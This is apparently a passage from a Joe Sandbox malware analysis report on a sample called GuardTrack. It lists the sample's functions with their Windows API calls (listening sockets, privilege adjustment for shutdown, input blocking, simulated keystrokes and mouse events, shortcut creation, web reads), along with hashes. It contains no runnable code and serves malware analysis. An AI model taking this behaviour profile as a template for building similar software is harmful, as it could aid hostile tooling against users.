Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 2e31017bd5d3564982f555ffdf811945fcd0b88b654a0c1dac1b62937ea1e822
Instruction ID: eda7c056a024a4be2adee7225d31d40fd7be371fc139aab8fe96bac43c2db4d7
Opcode Fuzzy Hash: 2e31017bd5d3564982f555ffdf811945fcd0b88b654a0c1dac1b62937ea1e822
Instruction Fuzzy Hash: 3D012B71750722EBF76C6269DC8BBFBF65BEB85740F1C0129F913D21D2EA505C808164

Function 0062696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 006269C7
WSAGetLastError.WSOCK32(00000000), ref: 006269D6
bind.WSOCK32(00000000,?,00000010), ref: 006269F2
listen.WSOCK32(00000000,00000005), ref: 00626A01
WSAGetLastError.WSOCK32(00000000), ref: 00626A1B
closesocket.WSOCK32(00000000,00000000), ref: 00626A2F

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 7179c17cd8415c50f773fa6d56f655eeae4e9755653fae0f473ea7dca7853792
Instruction ID: ddec7183379061b9a2af254d3d890d956e09a504efd55834b32e7b436ca851cb
Opcode Fuzzy Hash: 7179c17cd8415c50f773fa6d56f655eeae4e9755653fae0f473ea7dca7853792
Instruction Fuzzy Hash: AF21EE346006219FDB10EF64D889AAEB7AAEF45720F148558F916A73D2CB30AC01CF91

Function 005B1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 005B1DD6
GetSysColor.USER32(0000000F), ref: 005B1E2A
SetBkColor.GDI32(?,00000000), ref: 005B1E3D

Part of subcall function 005B166C: DefDlgProcW.USER32(?,00000020,?), ref: 005B16B4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 23e266bda79dcaefd35f493512ae5e792b07ba8d45a6d0c274eb6a91ba594fec
Instruction ID: 31efa6cf76b5988823bce8e32bfa8b2127679d7aaf8e6fcbdd48c56f656f9ab9
Opcode Fuzzy Hash: 23e266bda79dcaefd35f493512ae5e792b07ba8d45a6d0c274eb6a91ba594fec
Instruction Fuzzy Hash: C6A149B1105C45BEEBAC6B6A8C69EFB3D5EFB41342FA00519F442D5195CA30BD01C2BE

Function 0061C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0061C329
_wcscmp.LIBCMT ref: 0061C359
_wcscmp.LIBCMT ref: 0061C36E
FindNextFileW.KERNEL32(00000000,?), ref: 0061C37F
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0061C3AF

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 270ecce4838ff7fc183c8a983f7b99babcd59d07e988627a06b36f87aca95f9f
Instruction ID: 5af0b39ad39688352d7dd6965123a0efaa073f011585ec6591d0a6e927769273
Opcode Fuzzy Hash: 270ecce4838ff7fc183c8a983f7b99babcd59d07e988627a06b36f87aca95f9f
Instruction Fuzzy Hash: 915188756046028FD714DF68C494AEEB7E9FF49320F14861EE966CB3A2DB30AD41CB91

Function 00626E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00628475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006284A0

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00626E89
WSAGetLastError.WSOCK32(00000000), ref: 00626EB2
bind.WSOCK32(00000000,?,00000010), ref: 00626EEB
WSAGetLastError.WSOCK32(00000000), ref: 00626EF8
closesocket.WSOCK32(00000000,00000000), ref: 00626F0C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: bfa4caf4b5f62ea459844f2b61da6ccec54446fa7499d2e1455ce4f8264e3958
Instruction ID: ae088a4d491dad952f7ebe6206059452d07e21c33513b49e42241975e95aaf04
Opcode Fuzzy Hash: bfa4caf4b5f62ea459844f2b61da6ccec54446fa7499d2e1455ce4f8264e3958
Instruction Fuzzy Hash: D741D6756006116FDB20AF64DC8AFBE7BA9EF85710F048458FA45AB3D3DA70AD018F91

Function 006359B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00635A02
IsWindowEnabled.USER32 ref: 00635A10
GetForegroundWindow.USER32(?,?,00000001), ref: 00635A1D
IsIconic.USER32 ref: 00635A2B
IsZoomed.USER32 ref: 00635A39

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 4c100df9839f86c1543c44e8be6b65835d2e8535ebe562a2698b01e9effb797c
Instruction ID: 9fd58ce99a81ec92e48e6cac5094f89f9e154f13a986994cbce01560cc678844
Opcode Fuzzy Hash: 4c100df9839f86c1543c44e8be6b65835d2e8535ebe562a2698b01e9effb797c
Instruction Fuzzy Hash: 6911C4763009229FE7215F269C84BAE7B9BFF85721F054529F947D7242CB30E9018AE1

Function 0061C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0061CA75
CoCreateInstance.OLE32(00643D3C,00000000,00000001,00643BAC,?), ref: 0061CA8D

Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77

CoUninitialize.OLE32 ref: 0061CCFA

Strings

.lnk, xrefs: 0061CA09, 0061CA31, 0061CA3B

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: a1b29fff34b846460641f1b375c609dba83f2f1fb1cdf071e96643e0fee2a0b5
Instruction ID: df07c9c269e5b84324ca48068a00da61002dc00d6832ff0f8960716bc179dd6c
Opcode Fuzzy Hash: a1b29fff34b846460641f1b375c609dba83f2f1fb1cdf071e96643e0fee2a0b5
Instruction Fuzzy Hash: 34A13971104206AFD310EF64C885EABBBE9FF95714F04491CF155972A2EB70EA49CB92

Function 005F0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 005F0034
__swprintf.LIBCMT ref: 005F0065

Strings

%.3d, xrefs: 005F003F
WIN_XPe, xrefs: 005F00A4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 85a9d80f1ccc4d819b8e74497d6a56f30d41f467a3c420ae0445c86914bd8075
Instruction ID: 4876e6c76a592d422bc6df4660561ea88e419fee195c27e3df3e8c7554bd9d05
Opcode Fuzzy Hash: 85a9d80f1ccc4d819b8e74497d6a56f30d41f467a3c420ae0445c86914bd8075
Instruction Fuzzy Hash: E4D01D7180411DEAC7149650C94CDFA7B7DFB44300F541852F705D1081D63957589A16

Function 006229BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00622AAD
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00622AE4

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 035f2fe1164c8e6b8c9efbc8a52c25748504738107bb7da7efa23236852ba787
Instruction ID: db4c4cd5591ff90bf7d06d4bc047e1edcc576aea92185e104097eab5e4b11abb
Opcode Fuzzy Hash: 035f2fe1164c8e6b8c9efbc8a52c25748504738107bb7da7efa23236852ba787
Instruction Fuzzy Hash: 4741F671600A1BBFEB20DE55EC95EFBB7AEEB40754F10401EF601A6681EA709E419E60

Function 0061B976 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0061B986
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0061B9E0
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0061BA2D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 80b8c42f82d2e38e6a71f6b9b50774ad76163f458b7aa6f61de110f46c91b829
Instruction ID: f657dcdd4bda554ba6e04550d80e0c5e5919db2b02d140a6beac17a71481150e
Opcode Fuzzy Hash: 80b8c42f82d2e38e6a71f6b9b50774ad76163f458b7aa6f61de110f46c91b829
Instruction Fuzzy Hash: A7218E35A00118EFCB00EFA5D884AEEBBB9FF89310F1481A9E905A7352DB31A955CB50

Function 00609399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 005D0FE6: std::exception::exception.LIBCMT ref: 005D101C
Part of subcall function 005D0FE6: __CxxThrowException@8.LIBCMT ref: 005D1031

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006093E3
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00609410
GetLastError.KERNEL32 ref: 0060941D

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: bae7c48b20caefd6ee583090ca753cabe807db25441df7aa6b0c0bc4903658af
Instruction ID: 1f90698634111f48334971e46e0838561e97605a9074ea8717f09b129b99363a
Opcode Fuzzy Hash: bae7c48b20caefd6ee583090ca753cabe807db25441df7aa6b0c0bc4903658af
Instruction Fuzzy Hash: 6E114FB1414205AFE728DF54EC89D6BBBFEFB48710B20852EF45996791EB70AC41CB60

Function 00614254 Relevance: 4.6, APIs: 3, Instructions: 59fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00614271
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 006142B2
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 006142BD

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 8e3b5f65548bf5ec11bb49cd1ca3eec64b359fe84c30a5b8b54177ff4972b08c
Instruction ID: 8b5567af8116c269a59434a6fd6bc104953cc844ebe53750e348185e4f1619da
Opcode Fuzzy Hash: 8e3b5f65548bf5ec11bb49cd1ca3eec64b359fe84c30a5b8b54177ff4972b08c
Instruction Fuzzy Hash: D6115E75E01228BFEB108FA5AC44BEFBFBDEB45B60F104166FD04E7290C6705A419BA1

Function 00614F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00614F45
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00614F5C
FreeSid.ADVAPI32(?), ref: 00614F6C

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 8ca8673af7997a3da3a1e71382640ac29c8bfff651ed7dd00910f5d7f5a28d3b
Instruction ID: 7dd540c64c050056623898bfe03df517139fd4258ddfcb9ded9717d99fbd7d4c
Opcode Fuzzy Hash: 8ca8673af7997a3da3a1e71382640ac29c8bfff651ed7dd00910f5d7f5a28d3b
Instruction Fuzzy Hash: 62F04F7991130CBFEF00DFE0DC89AADB7BDEF08601F005469AA01E2280D7345A448B50

Function 00611AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00611B01
keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00611B14

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 29c088ec920ab0e960656805c3da64e258365e6ac00b9d6e88f37c8618b51d0e
Instruction ID: 51728059213d65cb63a486a640ce6511d7fe0e4c085357a80bd5734a87c11071
Opcode Fuzzy Hash: 29c088ec920ab0e960656805c3da64e258365e6ac00b9d6e88f37c8618b51d0e
Instruction Fuzzy Hash: 5CF0497590420DABEB04CF94C805BFE7BB5FF04316F00804AFE559A292D3799615DF94

Function 0061A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00629B52,?,0064098C,?), ref: 0061A6DA
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00629B52,?,0064098C,?), ref: 0061A6EC

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 37096b77eef98e5f169da4d7f43d4794701bc8f8e65ef862993eaa0691ef5c71
Instruction ID: 87190a350baec1a1a65cae14500a30f017fb5d9875db3a28ebd9994592c08fdc
Opcode Fuzzy Hash: 37096b77eef98e5f169da4d7f43d4794701bc8f8e65ef862993eaa0691ef5c71
Instruction Fuzzy Hash: 8AF0E23540522EBBEB20AFA4CC48FEA3B6DBF09361F008255B90892181D6309A40CBE1

Function 00608DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00608F27), ref: 00608DFE
CloseHandle.KERNEL32(?,?,00608F27), ref: 00608E10

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: f3efaa592d0f0021ce0befa531439813769917c9b02e174656857ea4c150fda1
Instruction ID: eb9bb6d4348cbd9b22fdd7389313a5ef3cdd6717e6fa259b9c298e48cc69d18d
Opcode Fuzzy Hash: f3efaa592d0f0021ce0befa531439813769917c9b02e174656857ea4c150fda1
Instruction Fuzzy Hash: 0BE09A75010611EFF7262B54EC09D777BAAEB04210714891AF59580570DA715C90DB50

Function 005DA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,005D8F87,0000FCD7,?,?,00000001), ref: 005DA38A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005DA393

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 9b5a708716cac9b82e01d03f8a16f363bb374cf5b39630858c19ea1d164b8b81
Instruction ID: 9d96fa8311f953a58b7b5accccb23ea441458003368914bf1f091a4790cf6b86
Opcode Fuzzy Hash: 9b5a708716cac9b82e01d03f8a16f363bb374cf5b39630858c19ea1d164b8b81
Instruction Fuzzy Hash: 2FB09235064219EBEB422F91EC09B883F6AEB46A62F005010FB0D44060CF7254508A91

Function 006245D5 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 006245F0

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 61b34679186db2c46d0ca72be1191f0a8cf09372bfa66d21cedccfb230fb6119
Instruction ID: 0dbc67751d2195473fa49d4872ea1a9662486aa3b84a6f1ded858e5c65813434
Opcode Fuzzy Hash: 61b34679186db2c46d0ca72be1191f0a8cf09372bfa66d21cedccfb230fb6119
Instruction Fuzzy Hash: 9CE0DF3521022A9FD310AF59E808A8AFBE9AF94760F00841AFD49D7311DE70F8018F90

Function 006151E2 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00615205

Memory Dump Source

Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true

Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: bf9a9f4315109cbc4428cafa0e0a97a83f10de277a4e070b644af36c691cd992
